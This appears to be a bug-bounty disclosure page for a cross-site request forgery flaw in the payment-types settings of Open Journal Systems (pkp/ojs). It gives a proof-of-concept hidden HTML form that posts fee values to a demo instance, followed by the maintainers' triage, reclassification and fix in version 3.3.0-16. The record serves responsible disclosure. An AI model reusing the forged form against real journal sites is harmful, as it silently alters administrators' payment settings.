CSRF in Payment Types in pkp/ojs


Reported on

Oct 8th 2023


CSRF in Payment Types

Proof of Concept

1 .Attacker send form fake to user

           <form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/payments/savePaymentTypes">
           <input type="hidden" name="csrfToken" value="" />
           <input type="hidden" name="publicationFee" value="3" />
           <input type="hidden" name="purchaseIssueFee" value="3" />
           <input type="hidden" name="purchaseArticleFee" value="3" />
           <input type="hidden" name="restrictOnlyPdf" value="3" />
           <input type="hidden" name="membershipFee" value="3" />
           <input type="hidden" name="submitFormButton" value="1" />
          <input type="submit" value="Submit request" />
           history.pushState('', '', '/');

2 .User click , edited unwanted payment types

Video Poc


Payload Poc



Traps users from performing unwanted actions

We are processing your report and will contact the pkp/ojs team within 24 hours. 5 months ago
HaiNguyen modified the report
5 months ago
We have contacted a member of the pkp/ojs team and are waiting to hear back 5 months ago
4 months ago


Hi, any new update ?

4 months ago


Sorry,I cannot report the same vulnerability more than once. The system doesn't allow that. This leaves me with an approximate choice of vulnerability. I also couldn't find the correct Occurrences link. Hope you understand. Thank.

Alec Smecher modified the Severity from Medium (6.3) to Low (3.5) 4 months ago
Alec Smecher
4 months ago


@admin, this has been filed in the wrong repository; it should be in pkp/ojs rather than pkp/pkp-lib. Can you change the repo? (9407)

Ben Harvie
4 months ago


The repository has been updated as requested.

Alec Smecher modified the CWE from Missing Authorization to Cross-Site Request Forgery (CSRF) 4 months ago
The researcher has received a minor penalty to their credibility for misclassifying the vulnerability type: -1
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Alec Smecher validated this vulnerability 4 months ago
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Alec Smecher marked this as fixed in 3.3.0-16 with commit 99a9f3 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago
to join this conversation